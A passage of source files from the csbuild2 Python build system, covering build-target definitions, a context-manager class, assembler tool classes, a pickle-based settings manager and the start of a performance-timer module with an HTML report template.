csbuild.Target(\"embeddedsymbols_sizeopt_static_release\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.EmbeddedSymbols,\n\t\t\tcsbuild.OptimizationLevel.Size,\n\t\t\tTrue,\n\t\t\tFalse,\n\t\t\t[\"EXPLICIT_DEFINE\"],\n\t\t\t[],\n\t\t)\n\twith csbuild.Target(\"externalsymbols_speedopt_dynamic_debug\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.ExternalSymbols,\n\t\t\tcsbuild.OptimizationLevel.Speed,\n\t\t\tFalse,\n\t\t\tTrue,\n\t\t\t[],\n\t\t\t[\"IMPLICIT_DEFINE\"],\n\t\t)\n\twith csbuild.Target(\"externalplussymbols_maxopt_static_debug\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.ExternalSymbolsPlus,\n\t\t\tcsbuild.OptimizationLevel.Max,\n\t\t\tTrue,\n\t\t\tTrue,\n\t\t\t[\"EXPLICIT_DEFINE\"],\n\t\t\t[\"IMPLICIT_DEFINE\"],\n\t\t)\n\twith csbuild.Target(\"incremental_linking\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.Disabled,\n\t\t\tcsbuild.OptimizationLevel.Disabled,\n\t\t\tFalse,\n\t\t\tFalse,\n\t\t\t[],\n\t\t\t[],\n\t\t)\n\twith csbuild.Target(\"custom_options\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.Disabled,\n\t\t\tcsbuild.OptimizationLevel.Disabled,\n\t\t\tFalse,\n\t\t\tFalse,\n\t\t\t[],\n\t\t\t[],\n\t\t)\n\t\twith csbuild.Toolchain(\"msvc\"):\n\t\t\tcsbuild.AddCompilerCxxFlags(\"/W4\")\n\t\t\tcsbuild.AddLinkerFlags(\"/STACK:1048576\")\n\t\twith csbuild.Toolchain(\"gcc\", \"clang\"):\n\t\t\tcsbuild.AddCompilerCxxFlags(\"-Wunused-variable\")\n\t\t\tcsbuild.AddLinkerFlags(\"-shared-libgcc\")\n\nwith csbuild.Project(\"cc_standard\", \"cc_standard\"):\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\tcsbuild.SetCcLanguageStandard(\"c11\")\n\nwith csbuild.Project(\"cxx_standard\", \"cxx_standard\"):\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\tcsbuild.SetCxxLanguageStandard(\"c++14\")\n\nwith csbuild.Project(\"incremental_linking\", \"cc_standard\"):\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\tcsbuild.SetCcLanguageStandard(\"c11\")\n\tcsbuild.SetIncrementalLink(True)\n" }, { "alpha_fraction": 0.7105863690376282, "alphanum_fraction": 0.7117938995361328, "avg_line_length": 28.693227767944336, "blob_id": "5d96796cc7cfc7e7e650f310a48ed2f68bffeb89", "content_id": "ba5e4ea83d289740d344f5092cf3584c32760b50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7453, "license_type": "no_license", "max_line_length": 143, "num_lines": 251, "path": "/csbuild/_build/context_manager.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: context_manager\n\t:synopsis: base context manager class\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport sys\nimport types\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = types.ClassType\n\nclass NestedContext(object):\n\t\"\"\"\n\tRepresents a nested context, allowing context managers to be chained, a la csbuild.Toolchain(\"foo\").Architecture(\"bar\")\n\n\t:param cls: The ContextManager being nested\n\t:type cls: ContextManager\n\t:param currentContext: The ContextManager it's being nested into\n\t:type currentContext: ContextManager\n\t\"\"\"\n\tdef __init__(self, cls, currentContext):\n\t\tself.cls = cls\n\t\tself.ctx = currentContext\n\n\tdef __call__(self, *args, **kwargs):\n\t\tret = self.cls(*args, **kwargs)\n\t\t# pylint: disable=protected-access\n\t\tret._parentContext = self.ctx\n\t\treturn ret\n\nclass MultiDataContext(object):\n\t\"\"\"Contains multiple pieces of data returned from a function - typically a list of functions to call.\"\"\"\n\tdef __init__(self, contexts):\n\t\tobject.__setattr__(self, \"inself\", True)\n\t\tself._contexts = contexts\n\t\tself._previousResolver = None\n\t\tobject.__setattr__(self, \"inself\", False)\n\n\t@property\n\tdef contexts(self):\n\t\t\"\"\"Get access to the contexts used for this manager\"\"\"\n\t\treturn self._contexts\n\n\tdef __enter__(self):\n\t\t\"\"\"\n\t\tEnter the context, making the listed contexts active\n\t\t\"\"\"\n\t\tobject.__setattr__(self, \"inself\", True)\n\n\t\t# pylint: disable=protected-access\n\t\tself._previousResolver = csbuild._resolver\n\t\tcsbuild._resolver = self\n\n\t\tobject.__setattr__(self, \"inself\", False)\n\n\tdef __exit__(self, excType, excValue, traceback):\n\t\t\"\"\"\n\t\tLeave the context\n\n\t\t:param excType: type of exception thrown in the context (ignored)\n\t\t:type excType: type\n\t\t:param excValue: value of thrown exception (ignored)\n\t\t:type excValue: any\n\t\t:param traceback: traceback attached to the thrown exception (ignored)\n\t\t:type traceback: traceback\n\t\t:return: Always false\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\t# pylint: disable=protected-access\n\t\tcsbuild._resolver = self._previousResolver\n\t\treturn False\n\n\tdef __getattribute__(self, name):\n\t\tif object.__getattribute__(self, \"inself\"):\n\t\t\treturn object.__getattribute__(self, name)\n\n\t\tcontexts = object.__getattribute__(self, \"_contexts\")\n\n\t\tfuncs = []\n\t\tfor context in contexts:\n\t\t\tif hasattr(context, name):\n\t\t\t\tfuncs.append(getattr(context, name))\n\n\t\tif funcs:\n\t\t\tdef _wrapDataMethods(*args, **kwargs):\n\t\t\t\trets = []\n\t\t\t\twith self:\n\t\t\t\t\tfor func in funcs:\n\t\t\t\t\t\trets.append(func(*args, **kwargs))\n\t\t\t\treturn MultiDataContext(rets)\n\n\t\t\treturn _wrapDataMethods\n\n\t\treturn object.__getattribute__(self, name)\n\nclass ContextManager(object):\n\t\"\"\"\n\tBase type for a context manager, used to set context for project plan settings\n\t:param contexts: list of contexts to activate within this manager's scope\n\t:type contexts: tuple(tuple(str, tuple(str, bytes)))\n\t:param methodResolvers: List of objects on which to look for additional methods for, i.e., csbuild.Toolchain(\"tc\").ToolchainSpecificFunction()\n\t:type methodResolvers: list(objects)\n\t\"\"\"\n\n\tmethodResolvers = []\n\n\tdef __init__(self, contexts, methodResolvers=None):\n\t\tobject.__setattr__(self, \"inself\", True)\n\t\tself._contexts = contexts\n\t\tself._methodResolvers = methodResolvers\n\t\tself._previousResolver = None\n\t\tself._parentContext = None\n\t\tself._inContext = False\n\t\tobject.__setattr__(self, \"inself\", False)\n\n\t@property\n\tdef contexts(self):\n\t\t\"\"\"Get access to the contexts used for this manager\"\"\"\n\t\treturn self._contexts\n\n\t@property\n\tdef resolvers(self):\n\t\t\"\"\"Get access to the resolvers used for this manager\"\"\"\n\t\treturn self._methodResolvers\n\n\tdef __enter__(self):\n\t\t\"\"\"\n\t\tEnter the context, making the listed contexts active\n\t\t\"\"\"\n\t\tobject.__setattr__(self, \"inself\", True)\n\t\tif self._parentContext is not None:\n\t\t\tobject.__getattribute__(self._parentContext, \"__enter__\")()\n\t\tif self._contexts is not None:\n\t\t\tcsbuild.currentPlan.EnterContext(*self._contexts)\n\n\t\tif self._methodResolvers:\n\t\t\tContextManager.methodResolvers.append(self._methodResolvers)\n\n\t\t\t# pylint: disable=protected-access\n\t\t\tself._previousResolver = csbuild._resolver\n\t\t\tcsbuild._resolver = self\n\n\t\tself._inContext = True\n\n\t\tobject.__setattr__(self, \"inself\", False)\n\n\tdef __exit__(self, excType, excValue, traceback):\n\t\t\"\"\"\n\t\tLeave the context\n\n\t\t:param excType: type of exception thrown in the context (ignored)\n\t\t:type excType: type\n\t\t:param excValue: value of thrown exception (ignored)\n\t\t:type excValue: any\n\t\t:param traceback: traceback attached to the thrown exception (ignored)\n\t\t:type traceback: traceback\n\t\t:return: Always false\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tobject.__setattr__(self, \"inself\", True)\n\n\t\tif self._methodResolvers:\n\t\t\t# pylint: disable=protected-access\n\t\t\tcsbuild._resolver = self._previousResolver\n\t\t\tContextManager.methodResolvers.pop()\n\n\t\tif self._contexts is not None:\n\t\t\tcsbuild.currentPlan.LeaveContext()\n\n\t\tif self._parentContext is not None:\n\t\t\tobject.__getattribute__(self._parentContext, \"__exit__\")(excType, excValue, traceback)\n\n\t\tself._inContext = False\n\n\t\tobject.__setattr__(self, \"inself\", False)\n\t\treturn False\n\n\tdef __getattribute__(self, name):\n\t\tif object.__getattribute__(self, \"inself\"):\n\t\t\treturn object.__getattribute__(self, name)\n\n\t\tif object.__getattribute__(self, '_inContext') is False:\n\t\t\twith self:\n\t\t\t\treturn getattr(self, name)\n\n\t\tif ContextManager.methodResolvers:\n\t\t\tfuncs = set()\n\n\t\t\tfor resolverList in ContextManager.methodResolvers:\n\t\t\t\tfor resolver in resolverList:\n\t\t\t\t\tif hasattr(resolver, name):\n\t\t\t\t\t\tfuncs.add(getattr(resolver, name))\n\n\t\t\tif funcs:\n\t\t\t\tdef _wrapResolverMethods(*args, **kwargs):\n\t\t\t\t\trets = []\n\t\t\t\t\tfor func in funcs:\n\t\t\t\t\t\trets.append(func(*args, **kwargs))\n\t\t\t\t\tif len(rets) == 1:\n\t\t\t\t\t\treturn rets[0]\n\t\t\t\t\tif len(rets) > 1:\n\t\t\t\t\t\treturn MultiDataContext(rets)\n\t\t\t\t\treturn None\n\n\t\t\t\treturn _wrapResolverMethods\n\n\t\t# pylint: disable=protected-access\n\t\tif hasattr(csbuild, name):\n\t\t\tobj = getattr(csbuild, name)\n\t\t\tif isinstance(obj, types.FunctionType):\n\t\t\t\tdef _wrapCsbuildMethod(*args, **kwargs):\n\t\t\t\t\twith self:\n\t\t\t\t\t\tobj(*args, **kwargs)\n\n\t\t\t\treturn _wrapCsbuildMethod\n\n\t\t\tif isinstance(obj, (_classType, _typeType)) and issubclass(obj, ContextManager):\n\t\t\t\treturn NestedContext(obj, self)\n\t\t\treturn obj\n\n\t\treturn object.__getattribute__(self, name)\n" }, { "alpha_fraction": 0.6307901740074158, "alphanum_fraction": 0.632541835308075, "avg_line_length": 33.253334045410156, "blob_id": "4e15d834a6467a3c5311a991eb905746fe9412df", "content_id": "186a53e54c343200e7732c917a5b3456fdc5b6a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5138, "license_type": "no_license", "max_line_length": 108, "num_lines": 150, "path": "/csbuild/tools/assemblers/assembler_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: assembler_base\n\t:synopsis: Base class for assemblers\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.tool_traits import (\n\tHasDebugLevel,\n\tHasDefines,\n\tHasIncludeDirectories,\n)\n\nfrom ... import commands, log\n\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\n@MetaClass(ABCMeta)\nclass AssemblerBase(HasDebugLevel, HasDefines, HasIncludeDirectories):\n\t\"\"\"\n\tBase class for assemblers\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tHasDebugLevel.__init__(self, projectSettings)\n\t\tHasDefines.__init__(self, projectSettings)\n\t\tHasIncludeDirectories.__init__(self, projectSettings)\n\n\t\tself._asmFlags = projectSettings.get(\"asmFlags\", [])\n\n\t\tself._projectTypeDefines = {\n\t\t\tcsbuild.ProjectType.Application: \"CSB_APPLICATION=1\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \"CSB_SHARED_LIBRARY=1\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \"CSB_STATIC_LIBRARY=1\",\n\t\t}\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef AddAssemblerFlags(*flags):\n\t\t\"\"\"\n\t\tAdd assembler flags.\n\n\t\t:param flags: List of asm flags\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"asmFlags\", flags)\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project, inputFile):\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFile):\n\t\treturn []\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tHasDebugLevel.SetupForProject(self, project)\n\t\tHasDefines.SetupForProject(self, project)\n\t\tHasIncludeDirectories.SetupForProject(self, project)\n\n\t\tif project.projectType in self._projectTypeDefines:\n\t\t\tself._defines.add(self._projectTypeDefines[project.projectType])\n\n\t\tself._defines.add(\"CSB_TARGET_{}=1\".format(project.targetName.upper()))\n\n\tdef Run(self, inputProject, inputFile):\n\t\t\"\"\"\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Build(\n\t\t\t\"Assembling {} ({}-{}-{})...\",\n\t\t\tinputFile,\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFile), env=self._getEnv(inputProject))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFile)\n\t\treturn self._getOutputFiles(inputProject, inputFile)\n" }, { "alpha_fraction": 0.6946471929550171, "alphanum_fraction": 0.6962692737579346, "avg_line_length": 37.53125, "blob_id": "601c6ce0d5afd8b8665c61c4b8816c4568737580", "content_id": "bbe255058d938680e042cb49bac4b5ef0ca2e97b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2466, "license_type": "no_license", "max_line_length": 117, "num_lines": 64, "path": "/csbuild/tools/assemblers/android_gcc_assembler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: android_gcc_assembler\n\t:synopsis: Android GCC assember tool\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom ..common.android_tool_base import AndroidToolBase\n\nfrom .gcc_assembler import GccAssembler\n\nclass AndroidGccAssembler(GccAssembler, AndroidToolBase):\n\t\"\"\"\n\tAndroid GCC assembler implementation\n\t\"\"\"\n\tsupportedArchitectures = AndroidToolBase.supportedArchitectures\n\n\tdef __init__(self, projectSettings):\n\t\tGccAssembler.__init__(self, projectSettings)\n\t\tAndroidToolBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t\"\"\"\n\t\tGccAssembler.SetupForProject(self, project)\n\t\tAndroidToolBase.SetupForProject(self, project)\n\n\tdef _getComplierName(self):\n\t\treturn self._androidInfo.gccPath\n\n\tdef _getArchitectureArgs(self, project):\n\t\t# The architecture is implied from the executable being run.\n\t\treturn []\n" }, { "alpha_fraction": 0.7092182040214539, "alphanum_fraction": 0.7110852003097534, "avg_line_length": 30.507352828979492, "blob_id": "4356f224437f60335ad8cabe259c7434df359769", "content_id": "66e5ba53a9cfc15af83b5d1033dfcc8e99b98e27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4285, "license_type": "no_license", "max_line_length": 98, "num_lines": 136, "path": "/csbuild/_utils/settings_manager.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: settings_manager\n\t:synopsis: Manages persistent settings for csbuild\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport shutil\nimport threading\n\nimport sys\n\nfrom . import PlatformBytes\n\ntry:\n\timport cPickle as pickle\nexcept ImportError:\n\timport pickle\nfrom .. import perf_timer, log\n\n_sentinel = object()\n\nclass SettingsManager(object):\n\t\"\"\"\n\tSettings manager class that manages persistent settings, storing and reading from disk on demand.\n\n\t:param settingsDir: Directory to store the data in\n\t:type settingsDir: str\n\t\"\"\"\n\tdef __init__(self, settingsDir):\n\t\tself.settings = {}\n\t\tself.settingsDir = settingsDir\n\t\tif not os.access(settingsDir, os.F_OK):\n\t\t\tos.makedirs(settingsDir)\n\t\tself.lock = threading.Lock()\n\n\tdef Save(self, key, value):\n\t\t\"\"\"\n\t\tSave a value, which will be pickled at protocol 2 so it's supported by all python versions.\n\n\t\t:param key: Key to store as. Must be a legitimate filename.\n\t\t:type key: str\n\t\t:param value: The value to store\n\t\t:type value: any\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"SettingsManager save\"):\n\t\t\t#pylint: disable=not-context-manager\n\t\t\tself.settings[key] = value\n\n\tdef Persist(self):\n\t\t\"\"\"\n\t\tWrite all settings back to disk\n\t\t\"\"\"\n\t\tfor key, value in self.settings.items():\n\t\t\tdirFromKey = os.path.join(self.settingsDir, os.path.dirname(key))\n\t\t\tif not os.access(dirFromKey, os.F_OK):\n\t\t\t\tos.makedirs(dirFromKey)\n\t\t\tlog.Info(\"Storing settings for {}\", os.path.join(self.settingsDir, key))\n\t\t\twith open(os.path.join(self.settingsDir, key), \"wb\") as f:\n\t\t\t\tpickle.dump(value, f, 2)\n\t\t\t\tf.flush()\n\n\tdef Clear(self):\n\t\t\"\"\"\n\t\tRemove all persisted settings\n\t\t\"\"\"\n\t\tshutil.rmtree(self.settingsDir)\n\n\tdef Get(self, key, default=None):\n\t\t\"\"\"\n\t\tGet a value from the settings store\n\n\t\t:param key: Key to load. Must be a legitimate filename.\n\t\t:type key: str\n\t\t:param default: The default if no stored value exists\n\t\t:type default: any\n\t\t:return: The loaded value, or default if not found\n\t\t:rtype: any\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"SettingsManager load\"):\n\t\t\t# Double-check lock pattern\n\t\t\tret = self.settings.get(key, _sentinel)\n\t\t\tif ret is _sentinel:\n\t\t\t\t# pylint: disable=not-context-manager\n\t\t\t\twith self.lock:\n\t\t\t\t\tret = self.settings.get(key, _sentinel)\n\t\t\t\t\tif ret is _sentinel:\n\t\t\t\t\t\tpathFromKey = os.path.join(self.settingsDir, key)\n\t\t\t\t\t\tif not os.access(pathFromKey, os.F_OK):\n\t\t\t\t\t\t\tself.settings[key] = default\n\t\t\t\t\t\t\treturn self.settings[key]\n\n\t\t\t\t\t\twith open(pathFromKey, \"rb\") as f:\n\t\t\t\t\t\t\tdata = f.read()\n\t\t\t\t\t\t\tif sys.version_info[0] == 2:\n\t\t\t\t\t\t\t\tdata = data.replace(PlatformBytes(\"cUserString\"), PlatformBytes(\"ccollections\"))\n\t\t\t\t\t\t\t\tdata = data.replace(PlatformBytes(\"cUserList\"), PlatformBytes(\"ccollections\"))\n\t\t\t\t\t\t\tret = pickle.loads(data)\n\n\t\t\t\t\t\tself.settings[key] = ret\n\t\t\treturn ret\n\n\tdef Delete(self, key):\n\t\t\"\"\"\n\t\tDelete a value from the settings store if it exists. Nop if it doesn't.\n\n\t\t:param key: Key to delete. Must be a legitimate filename.\n\t\t:type key: str\n\t\t\"\"\"\n\t\t#pylint: disable=not-context-manager\n\t\twith self.lock:\n\t\t\tself.settings.pop(key, None)\n\t\t\tpathFromKey = os.path.join(self.settingsDir, key)\n\t\t\tif os.access(pathFromKey, os.F_OK):\n\t\t\t\tos.remove(pathFromKey)\n" }, { "alpha_fraction": 0.5787550210952759, "alphanum_fraction": 0.6103860139846802, "avg_line_length": 37.08538055419922, "blob_id": "a48dac7ea9f3604542720dc3c5e066ca8b71b3c3", "content_id": "5d9008f7bfde28e43e7fb8f5bd29604419be25b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32563, "license_type": "no_license", "max_line_length": 208, "num_lines": 855, "path": "/csbuild/perf_timer.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: perf_timer\n\t:synopsis: Thread-safe performance timer to collect high-level performance statistics\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport time\nimport threading\nimport re\nimport math\nimport sys\nimport os\n\nfrom collections import deque\n_collecting = True\n\nclass ReportMode(object):\n\t\"\"\"\n\tEnum defining the perf timer reporting mode.\n\t\"\"\"\n\tTREE = 0\n\tFLAT = 1\n\tHTML = 2\n\ndef EnablePerfTracking(enable=True):\n\t\"\"\"\n\tEnable (or disable) the perf timer.\n\n\t:param enable: True to enable the perf timer, False to disable.\n\t:type enable: bool\n\t\"\"\"\n\tglobal _collecting\n\t_collecting = enable\n\ndef DisablePerfTracking():\n\t\"\"\"\n\tHelper function for explicitly disabling the perf timer.\n\t\"\"\"\n\tEnablePerfTracking(False)\n\n_htmlHeader = \"\"\"<!DOCTYPE html><HTML>\n\t<HEAD>\n\t\t<title>Perf report for {0}</title>\n\t\t<script type=\"text/javascript\">\n\t\t\tvar scriptLoaded = false;\n\t\t\tfunction checkScriptLoaded() {{\n\t\t\t\tif (!scriptLoaded) {{\n\t\t\t\t\tdocument.getElementById(\"errorbar\").innerHTML=\"Could not contact gstatic.com to access google charts API.Tree maps will not be available until connection is restored.\";\n\t\t\t\t}}\n\t\t\t}}\n\t\t\tfunction _width(s, w) {{\n\t\t\t\ts = \"0000\" + s\n\t\t\t\treturn s.substring(s.length - w)\n\t\t\t}}\n\n\t\t\tfunction _formatTime(totaltime){{\n\t\t\t\ttotalmin = Math.floor(totaltime / 60)\n\t\t\t\ttotalsec = Math.floor(totaltime % 60)\n\t\t\t\tmsec = Math.floor((totaltime - Math.floor(totaltime))*10000)\n\t\t\t\treturn totalmin + \":\" + _width(totalsec, 2) + \".\" + _width(msec, 4)\n\t\t\t}}\n\t\t</script>\n\t\t<style>\n\t\t\t.hoversort {{\n\t\t\t \tcursor: pointer; cursor: hand;\n\t\t\t}}\n\t\t\t.hoversort:hover{{\n\t\t\t\tcolor:blue;\n\t\t\t}}\n\t\t\t.percentbar {{\n\t\t\t\theight:22px;\n\t\t\t\tbackground-color:#a060ff;\n\t\t\t\tmargin-top:-22px;\n\n\t\t\t}}\n\n\t\t\t.gradient {{\n\t\t\t\tbackground: rgba(235,233,249,1);\n\t\t\t\tbackground: -moz-linear-gradient(top, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tbackground: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(235,233,249,1)), color-stop(50%, rgba(216,208,239,1)), color-stop(51%, rgba(206,199,236,1)), color-stop(100%, rgba(193,191,234,1)));\n\t\t\t\tbackground: 